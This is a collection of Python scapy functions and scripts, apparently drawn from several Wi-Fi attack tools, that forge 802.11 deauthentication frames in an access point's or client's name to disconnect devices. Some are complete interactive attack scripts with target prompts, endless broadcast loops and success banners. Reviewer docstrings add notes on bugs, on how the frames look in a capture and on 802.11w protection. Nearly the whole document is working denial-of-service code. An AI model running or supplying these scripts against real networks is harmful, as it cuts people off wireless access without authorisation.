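def _deauth_target(self, target, packet_count):
    """Send deauthentication frames to ``target`` in the name of the AP.

    Every frame is an 802.11 management frame (type 0, subtype 12) with
    reason code 1. Both the transmitter (addr2) and BSSID (addr3) fields
    carry ``self._ap_bssid``, so a capture shows the frames as coming from
    the access point. Stations that negotiated 802.11w protected
    management frames discard unprotected frames of this kind.

    The loop stops early once ``self._thread_event`` is cleared. When the
    method finishes it prints how many frames were handed to scapy and
    increments ``self._threads_finished`` under ``self._thread_lock``.

    :param target: MAC address placed in the receiver field (addr1)
    :param packet_count: number of frames to send
    """
    # Original author's note: this also works with subtype 10,
    # "Disassociation-Frame", verified with MBP running 10.12.4.
    ap_to_client_pckt = scapy.RadioTap() / scapy.Dot11(
        type=0, subtype=12, addr1=target,
        addr2=self._ap_bssid, addr3=self._ap_bssid
    ) / scapy.Dot11Deauth(reason=1)

    # Count completed sends directly. The previous "last index + 1" report
    # claimed one frame had been sent even when the loop stopped before
    # the first send.
    frames_sent = 0

    # NOTE(review): when range(packet_count) is empty the `or` hands the
    # for loop a bool, which is not iterable, so a packet_count of 0 or
    # below raises TypeError here. Left unchanged.
    for n in range(packet_count) or packet_count == -1:
        if not self._thread_event.isSet():
            break
        # Pause for 0.1 s before the first frame and after every 64th.
        if n % 64 == 0:
            time.sleep(0.1)
        scapy.sendp(ap_to_client_pckt)
        frames_sent += 1

    # NOTE(review): the listing lost its indentation; the summary is
    # assumed to be printed once, after the loop - confirm.
    print("Sent " + str(frames_sent) + " packets to " + target)

    with self._thread_lock:
        self._threads_finished += 1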
def deauth(**kwargs):
    """Send rounds of deauthentication frames for one access point.

    Options are looked up in ``kwargs`` by these keys:

    * ``broadcast`` - truthy to address the broadcast MAC instead of
      the ``clients`` list
    * ``clients`` - iterable of client MAC addresses (read only when
      ``broadcast`` is falsy)
    * ``ap`` - MAC address used as transmitter/BSSID
    * ``count`` - number of rounds
    * ``burst-size`` - frames sent per client in each round
    * ``sleep-time`` - seconds passed to ``time.sleep``

    For each client two frames are built: one from the AP to the client
    and one from the client to the AP. The second is only sent when
    ``broadcast`` is falsy. Frames are handed to ``sc.send``.

    In a capture this shows up as repeated bursts of deauthentication
    frames naming the same BSSID. Stations that negotiated 802.11w
    protected management frames discard unprotected frames of this kind.
    """
    to_everyone = kwargs.get("broadcast")
    if to_everyone:
        stations = ["ff:ff:ff:ff:ff:ff"]
    else:
        stations = kwargs.get("clients")
    bssid = kwargs.get("ap")

    for _round in range(kwargs.get("count")):
        for station in stations:
            # AP -> client
            from_ap = sc.Dot11(
                addr1=station, addr2=bssid, addr3=bssid
            ) / sc.Dot11Deauth()
            # client -> AP
            from_station = sc.Dot11(
                addr1=bssid, addr2=station, addr3=bssid
            ) / sc.Dot11Deauth()

            for _burst in range(kwargs.get("burst-size")):
                sc.send(from_ap)
                if not to_everyone:
                    sc.send(from_station)
        # NOTE(review): the listing lost its indentation; the pause is
        # assumed to happen once per round - confirm against the file.
        time.sleep(kwargs.get("sleep-time"))
def deuath(self, ap: AccessPoint):
    """
    Broadcast deauthentication frames in the name of ``ap``, forever.

    The frame is addressed to the broadcast MAC, and ``ap.bssid`` is used
    for both the transmitter (addr2) and BSSID (addr3) fields, with reason
    code 7. It is sent on ``self._interface`` inside a ``while True`` loop,
    so this method never returns.

    In a capture this is a continuous stream of broadcast deauthentication
    frames carrying one BSSID. Stations that negotiated 802.11w protected
    management frames discard unprotected frames of this kind.
    """
    radio_header = scapy.RadioTap()
    dot11_header = scapy.Dot11(
        addr1="FF:FF:FF:FF:FF:FF",
        addr2=ap.bssid,
        addr3=ap.bssid,
    )
    frame = radio_header / dot11_header / scapy.Dot11Deauth(reason=7)

    # No exit condition: only an exception ends the loop.
    while True:
        scapy.sendp(frame, iface=self._interface)
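def deauth(self, ssid, mac, client="FF:FF:FF:FF:FF:FF"):
    """Send 100 pairs of deauthentication frames between ``mac`` and ``client``.

    Two management frames (type 0, subtype 12) are built, both with
    ``mac`` as BSSID (addr3):

    * AP -> client, reason 5 ("AP cannot handle this many stations")
    * client -> AP, reason 8 ("Client is leaving")

    They are written through one layer-2 socket opened on
    ``self.netifmon`` while the module-level ``ipiw_lock`` is held.
    The reason codes and the fixed 100-pair burst are visible in a
    capture. Stations that negotiated 802.11w protected management
    frames discard unprotected frames of this kind.

    :param ssid: accepted but not used by this method
    :param mac: MAC address of the access point
    :param client: MAC address of the client; defaults to broadcast
    """
    global ipiw_lock
    ipiw_lock.acquire()
    # try/finally so an exception while building or sending frames cannot
    # leave ipiw_lock held or the socket open.
    try:
        # AP -> Client
        p1 = sc.RadioTap() / sc.Dot11(
            type=0, subtype=12, addr1=client, addr2=mac, addr3=mac
        ) / sc.Dot11Deauth(reason=5)  # "AP cannot handle this many stations"

        # Client -> AP
        p2 = sc.RadioTap() / sc.Dot11(
            type=0, subtype=12, addr1=mac, addr2=client, addr3=mac
        ) / sc.Dot11Deauth(reason=8)  # "Client is leaving"

        # One reusable socket (the original comment says: for performance).
        s = sc.conf.L2socket(iface=self.netifmon)
        try:
            for i in range(100):
                s.send(p1)
                s.send(p2)
        finally:
            s.close()
    finally:
        ipiw_lock.release()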
def scan(self):
    """Transmit deauthentication frames between two hard-coded MACs.

    Despite its name this method does not scan anything. It builds one
    RadioTap / Dot11 / Dot11Deauth frame with fixed addresses and passes
    it to ``scapy.sendp`` with ``count=10000``, ``inter=0.2`` and the
    interface name ``"Wi-Fi"``.

    Stations that negotiated 802.11w protected management frames discard
    unprotected frames of this kind.
    """
    station = "28:cf:e9:1e:50:2d"
    bssid = "0a:00:27:00:00:0e"

    # 802.11 header fields:
    #   addr1 - destination MAC
    #   addr2 - source MAC
    #   addr3 - access point MAC
    header = scapy.Dot11(addr1=station, addr2=bssid, addr3=bssid)

    # Layer the frame: radio header, 802.11 header, deauth body.
    frame = scapy.RadioTap() / header / scapy.Dot11Deauth()

    scapy.sendp(frame, inter=0.2, count=10000, iface="Wi-Fi", verbose=1)
def craft_deauth_packet(sender, receiver, bssid):
    """
    Build (but do not send) an 802.11 deauthentication frame

    The frame is a management frame (type 0, subtype 12). ``receiver``
    goes into addr1, ``sender`` into addr2 and ``bssid`` into addr3.
    The three address fields are what a capture exposes when such a
    frame is analysed.

    :param sender: MAC address placed in the transmitter field
    :param receiver: MAC address placed in the receiver field
    :param bssid: MAC address of the access point
    :type sender: str
    :type receiver: str
    :type bssid: str
    :return: The layered RadioTap / Dot11 / Dot11Deauth frame
    :rtype: scapy.layers.dot11.RadioTap
    """
    radio_header = scapy.RadioTap()
    dot11_header = scapy.Dot11(
        type=0,
        subtype=12,
        addr1=receiver,
        addr2=sender,
        addr3=bssid,
    )
    frame = radio_header / dot11_header / scapy.Dot11Deauth()
    return frame
def disconnect_device(router_mac: str, target_mac: str, iface: str, count: int):
    """
    Send deauthentication frames to one device in the name of its router.

    The frame is a management frame (type 0, subtype 12) with reason
    code 7; ``router_mac`` fills both the transmitter (addr2) and BSSID
    (addr3) fields. Frames are passed to ``sendp`` with ``inter=0.1``.
    Stations that negotiated 802.11w protected management frames discard
    unprotected frames of this kind.

    Args:
        router_mac (str): MAC address used as transmitter and BSSID.
        target_mac (str): MAC address placed in the receiver field.
        iface (str): Name of the interface passed to ``sendp``.
        count (int): Number of frames to send. A value of 0 is replaced
            by ``None`` before the call, leaving the count to scapy.
    """
    frame_count = None if count == 0 else count

    header = sc.Dot11(
        type=0,
        subtype=12,
        addr1=target_mac,
        addr2=router_mac,
        addr3=router_mac,
    )
    frame = sc.RadioTap() / header / sc.Dot11Deauth(reason=7)

    sc.sendp(frame, inter=0.1, count=frame_count, iface=iface, verbose=0)
# Banner. RED, YELLOW, CYAN, GREEN, RESET and `start` are defined
# elsewhere in the file.
print(f"{RED}" + start)

# Tell the operator that the wireless card must be in monitor mode.
print(
    f"{YELLOW}\n[!] Before run this program set your wireless card to monitor mode \n"
)

# Read the frame parameters interactively. The values are used as typed;
# a non-numeric packet count makes int() raise ValueError.
target_mac = input(f"{CYAN}Target MAC [EX: 68-7D-6B-OE-b-41]={RESET} ")
gateway_mac = input(f"{CYAN}Gateway MAC [EX: a4-33-d7-3a-d0-37]={RESET} ")
interface = input(f"{CYAN}interface [EX: wlan0man]={RESET} ")
packets = int(input(f"{CYAN}Number os packets={RESET} "))

# 802.11 header fields:
#   addr1 - destination MAC
#   addr2 - source MAC
#   addr3 - access point MAC
dot11 = scapy.Dot11(addr1=target_mac, addr2=gateway_mac, addr3=gateway_mac)

# Layer the frame: radio header, 802.11 header, deauth body (reason 7).
# Stations that negotiated 802.11w protected management frames discard
# unprotected frames of this kind.
packet = scapy.RadioTap() / dot11 / scapy.Dot11Deauth(reason=7)

# NOTE(review): each pass hands sendp count=100, and the loop runs for
# p = 0 .. packets inclusive, so the number typed at the prompt is a
# number of passes (minus one), not a number of frames.
p = 0
while p <= packets:
    scapy.sendp(packet, inter=0.1, count=100, iface=interface, verbose=1)
    # Progress line showing the pass index.
    print(f"{YELLOW}[!] Packets send " + str(p))
    p += 1

print(f"{GREEN}\n[+] ATTACK DONE !!!{RESET}")
# `ap`, `clients` and `sniffmgmt` are defined earlier in the file; `ap`
# and `clients` are indexed as lists below. The typed numbers are not
# validated, so a non-numeric or out-of-range entry raises.
apNum = raw_input(
    "Pleas choose Ap from list above to see all devices on the AP \033[1m--enter Ap number--\033[0m"
)
print("connect to: ", ap[int(apNum)])

# Step 3: capture on mon0 for 20 seconds, passing each frame to sniffmgmt.
scapy.sniff(iface="mon0", prn=sniffmgmt, timeout=20)

# Step 4: pick the client by its position in the `clients` list.
macNum = raw_input(
    "Pleas choose device from list above to start Wifi deauth-attack \033[1m--enter mac number from list--\033[0m"
)
print("connect to: ", clients[int(macNum)])

# From here on `ap` is the chosen access point MAC, not the list.
ap = ap[int(apNum)]

# Chosen client MAC.
client = clients[int(macNum)]

# Deauthentication frame: receiver (addr1) is the access point, while the
# client MAC fills both addr2 and addr3. Stations and access points that
# negotiated 802.11w protected management frames discard unprotected
# frames of this kind.
pkt1 = scapy.RadioTap() / scapy.Dot11(
    addr1=ap, addr2=client, addr3=client
) / scapy.Dot11Deauth()

# Keep sending on mon0 until 100 seconds have elapsed.
t_end = time.time() + 100
while time.time() < t_end:
    scapy.sendp(pkt1, iface="mon0", inter=0.001)

raw_input(
    " '\033[1m'Finsih sucssesfuly! ThankYou Press --Enter to exit '\033[0m'")